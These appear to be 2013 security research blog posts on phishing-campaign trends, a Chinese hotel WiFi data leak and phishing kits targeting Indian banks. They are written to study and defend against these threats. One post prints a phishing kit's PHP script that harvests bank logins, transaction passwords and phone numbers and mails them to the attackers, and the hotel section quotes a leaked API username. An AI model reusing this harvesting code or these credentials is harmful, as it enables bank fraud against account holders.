WebSense recently released an InfoGraphic titled "Top Five Subject Lines in Phishing Emails." for January 1, 2013 through September 30, 2013. WebSense has a few differences in the way they gather their data, including being world-wide in their focus (most of my readers probably aren't receiving regular spam with the subject "Communicazione Importante"). But I also wondered about what is happening more recently. We know that the Cutwail spammers who were using the BlackHole Exploit server were the primary folks who were sending out all of those malicious LinkedIn emails, so have the top threats changed since Paunch and friends were arrested in October and the Black Hole Exploit server started drying up?
Malcovery Security has been putting out daily reports of the Top Threat Today in the malicious email world for all of 2013 (although at the beginning of the year they were still using their UAB-legacy name "Emerging Threats By Email"). These reports provide a "deep dive" look at the most prominent malware-laden email of the day. Mid-summer we made the determination that in addition to pushing out "THE" top threat, we would look at other significant malware campaigns of the day, and try to get those reports out faster and in a machine-consumable format.
Last week we presented a one-hour Webinar (still accessible, if you'd like to watch/listen to the recording) - State of Cybersecurity 2013/2014. The first 2/3rds of the webinar walks through the significant cybersecurity events of the year, followed by some Malcovery stats, like the chart shown below, followed by my Ten Security Predictions for 2014.

So, do we see LinkedIn spam as the most dangerous email "post-Paunch"? And for that matter, was it the most dangerous during the BlackHole dominated early portion of the year?
During the "Top Report of the Day" early part of the year, we saw a WIDE variety of brands. In fact, in January our top reports included:
Adobe, ADP, American Airlines, BBB(4x), Bank of America, British Airways, Citibank, Digital Insights, DocuSign(2x), Dunn & Bradstreet, eFax, EFTPS (3x), FedEx, Facebook (2x), IRS, KeyBank, LinkedIn, PayPal, US Airways, Verizon, and Xerox.
LinkedIn earned the "Top Threat of the Day" position many times during the year, including January 21, April 9, April 10, July 26, August 28, September 27, and October 24. That is still less than ADP, which was the "Top Threat" on at least thirteen days (January 14, January 22, February 5, February 11, March 15, March 21, March 29, May 13, May 24, August 6, August 16, October 22, November 1st).
But what about the RECENT stuff? And how do things shape up when we look at ALL the significant malware threats we saw delivered by email instead of only "THE" top threat?

Malicious Spam Campaigns August 1 - December 13

For August 1 - December 13, here are the "Campaigns" that we saw most prominently in our T3 XML reporting:
40 Days ==> Wells Fargo (+10 Days as "Top Threat" - August 6, 9, 23, September 16, 24, October 14, 29, 30, November 27, December 11)
40 Days ==> FedEx (+ 7 Days as "Top Threat" - September 5, 9, 10, 11, 17 & October 4, 10, 30)
24 Days ==> ADP (+ "Top" on August 6, 16, October 22, November 1)
23 Days ==> Facebook (+ September 6, 27)
22 Days ==> HMRC (Her Majesty's Revenue & Customs) (+ October 21)
19 Days ==> "Picture" spam (+ October 23, November 8, 18, 22, December 10, 13)
16 Days ==> Royal Bank of Scotland
15 Days ==> Companies House UK
11 Days ==> Sage
10 Days ==> American Express
10 Days ==> HSBC
10 Days ==> LinkedIn (+ August 6, 16, October 22, November 1)
9 Days ==> Dun & Bradstreet
So what does "Most Dangerous" mean? I would certainly agree that a very well-crafted graphical LinkedIn invitation is more likely to be clicked on than a poorly worded letter from a Wells Fargo advisor with a .zip attachment that I'm supposed to open. It could be that WebSense's scoring system takes into account their observed "click-through and attempted click-through" rate, but our measure shows LinkedIn in 10th place as far as active malicious spam campaigns since August 1st, and only two days since the estimated arrest date of Paunch -- October 16th and October 24th.

20 Million Chinese Hotel Guests have data leaked

This morning Secure Computing shared a brief article about Data on 20 Million Chinese Hotel Guests being shared by hackers. Unfortunately the only link in the article was a search for the word Breach on SCMagazine's own website.

The source was South China Morning Post, which has actually been writing about this for some time. On October 11, Amy Li reported that "Home Inn Hotels", a popular discount chain, and Hanting Hotel Group were using "faulty hotel management software" developed by CNWISDOM. This was reported by "independent internet security watchdog". The NASDAQ traded hotel chain eventually acknowledged the vulnerability, which they described as a weakness in their Wireless Portal Security System, and announced on their home page that the issue had been resolved, thanking WooYun for helping them with the vulnerability.

CNWisdom Data Leaks

Shortly after the initial exchange, a seller on Taobao (think Chinese eBay) announced that he was selling 8 Gigabytes of hotel guest data for 2,000 Yuan. South China Morning Post reported that the chain had 450,000 hotel rooms in 4,500 hotels, and that when guests register, they are required to provide their home address, phone number, ID card, date of birth, and workplace if they want to use the WiFi service. This is apparently the data that was received.

As reported in Patrick Boehler's December 9th story in the South China Morning Post, Chinese Hackers Leak Hotel Guest Data on WeChat, multiple websites were distributing the hotel data for 20 million guests, and some enterprising hackers had even built a chat interface allowing you to TXT someone's ID card number to the service and have it reply with the details of any hotel stays by that guest.


WooYun regularly shares vulnerability data, so we thought we would start at the beginning and find that. There were several "cnwisdom" breach reports there, including:

WooYun-2013-41171 (submitted October 28, 2013) - which referred to an SQL injection vulnerability

WooYun-2013-41171 (submitted October 27, 2013) - which referred to a STRUCTS problem

WooYun-2013-034935 (submitted August 21, 2013) - the WiFi Data Leak

Unfortunately, I have to rely on some Google Translate here ...

The way WooYun explains it is (Gary's paraphrase of the Google Translate of what they said:)

"Users connect to their hotel's open WiFi, which requires them to use a webpage to authenticate. That webpage is using http protocol, which means the username and password are transmitted in the clear. But the next phase of the authentication is to update a central database of WiFi information. IN THE CLEAR, the authentication connects to a database using the username "cnwisdomapi" and the password "3b823[马赛克]ac36a"!!
That authentication userid and password can be used to query details for anyone who used the WIFI in ANY of these hotels!"

After the media used this screen shot in their reports, the hotel chain responded, saying that the screen shot did not represent personal information of their guests.

The "Vulnerability Response" section says that the vendor was notified and confirmed the vulnerability on August 26th. On October 8th, they replied that the Vulnerabilities had been repaired and a proper authentication method that preserved encryption throughout the process to protect guests had been implemented.
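The two weaknesses in the report (a login page served over plain HTTP, and a backend credential sent in the clear) can be checked for in any captive portal's page source. The sketch below is an added example, not code from WooYun or the vendor; it assumes the backend credential shows up as a URL query parameter, and the hosts and values in the sample are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

SECRET_KEYS = {"password", "passwd", "pwd", "pass", "secret", "token"}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

# Constructed sample portal page; hosts and parameter values are placeholders.
SAMPLE_URL = "http://portal.example.invalid/login"
SAMPLE_HTML = """
<form action="/auth" method="post">
  <input name="room"><input type="password" name="pw">
</form>
<script>
  var sync = "http://api.example.invalid/guest?user=API_USER&password=API_SECRET";
</script>
"""

class FormScan(HTMLParser):
    """Record [action, has_password_field] for every <form> on the page."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            self.forms.append([attr.get("action") or "", False])
        elif tag == "input" and self.forms:
            if (attr.get("type") or "").lower() == "password":
                self.forms[-1][1] = True

def audit_portal(page_url, html):
    """Flag password forms posted without TLS and secrets carried in URLs."""
    findings = []
    scan = FormScan()
    scan.feed(html)
    for action, has_password in scan.forms:
        target = urljoin(page_url, action)  # empty action posts back to the page
        if has_password and urlsplit(target).scheme != "https":
            findings.append(("cleartext-login", target))
    for url in URL_RE.findall(html):
        parts = urlsplit(url)
        if {k.lower() for k, _ in parse_qsl(parts.query)} & SECRET_KEYS:
            kind = "secret-in-url" if parts.scheme == "https" else "secret-in-cleartext-url"
            # Report the endpoint only, so the finding does not repeat the secret.
            findings.append((kind, f"{parts.scheme}://{parts.netloc}{parts.path}"))
    return findings
```

A portal repaired the way the vendor described, with encryption preserved throughout and no shared credential in the page, produces no findings.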

WooYun and 189

This is hardly the first major breach from WooYun! In January they reported serious vulnerabilities in the Chinese telecom giant 189's infrastructure that allowed any user with a web browser to get detailed billing information, including the user name, address, and detailed call history for any mobile phone user!

The same breach report also shared details on how anyone could access a web server on "" and use the "wapLogin/sendSms.action" to send unauthenticated SMS messages to any cell phone!

In a wonderful example of responsible reporting, WooYun declared the vulnerability to be "Level 20" (their highest rank) and reported the details to the CNCERT National Internet Emergency Center on January 22 prior to releasing the details publicly on March 8, 2013.

Friday, December 13, 2013

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends which was so much fun to prepare! (We recorded the webinar for those who missed it - you can watch the recording here: State of Cybersecurity 2013/2014.) We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community - researchers, security companies, and law enforcement - had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking, the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated. These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Chartered, and Tamilnad Mercantile Bank.

(Screen shot of phish on "")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites.,, and were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at More recently, the "" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message  = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP      : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = ",,,";
$subject = "Andhra $ip";
$headers = "From:";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers)) 
   {     header("Location:");    }else    

    {   echo "ERROR! Please go back and try again.";      }>
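Recovering the drop addresses from action files like the one above, and grouping hacked sites by the addresses they share, can be automated once the kits are collected. The following is an added example, not Malcovery's tooling or code from the post; the kit paths and every address in it are constructed placeholders.

```python
import re
from collections import defaultdict

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_ARG_RE = re.compile(r"""\bmail\s*\(\s*(\$\w+|"[^"]*"|'[^']*')""")
POST_RE = re.compile(r"""\$_POST\[\s*['"](\w+)['"]\s*\]""")

# Constructed samples; addresses and paths are placeholders, not values from the page.
SAMPLE_KITS = {
    "hacked-site-1/andhra/action.php": r'''
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$recipient = "drop1@example.invalid,Drop2@example.invalid";
if (mail($recipient,$subject,$message,$headers)) { header("Location:"); }''',
    "hacked-site-2/bank-b/action.php": r'''
$message .= "Mobile: " .$_POST['mobile']."\n";
$recipient = "drop1@example.invalid";
$recipient .= ",drop3@example.invalid";
mail($recipient,$subject,$message,$headers);''',
    "hacked-site-3/bank-c/action.php": r'''
mail("drop3@example.invalid", "Bank C $ip", $message, $headers);''',
}

def extract_recipients(php):
    """Return the sorted drop addresses that the kit's mail() calls send to."""
    found = set()
    for arg in MAIL_ARG_RE.findall(php):
        if arg.startswith("$"):
            # Variable recipient: collect every string assigned (= or .=) to it.
            assign = re.compile(re.escape(arg) + r"""\s*\.?=\s*(["'])(.*?)\1\s*;""")
            texts = [m.group(2) for m in assign.finditer(php)]
        else:
            texts = [arg[1:-1]]  # literal recipient: strip the quotes
        for text in texts:
            found.update(addr.lower() for addr in EMAIL_RE.findall(text))
    return sorted(found)

def extract_post_fields(php):
    """Return the form fields the kit harvests, in first-seen order."""
    return list(dict.fromkeys(POST_RE.findall(php)))

def cluster_by_recipient(kits):
    """Map each drop address to the set of kit paths that mail to it."""
    clusters = defaultdict(set)
    for path, php in kits.items():
        for addr in extract_recipients(php):
            clusters[addr].add(path)
    return dict(clusters)
```

An address that appears under several unrelated hacked sites ties those sites to one operator, and the harvested field names show which credentials victims of each kit need to change.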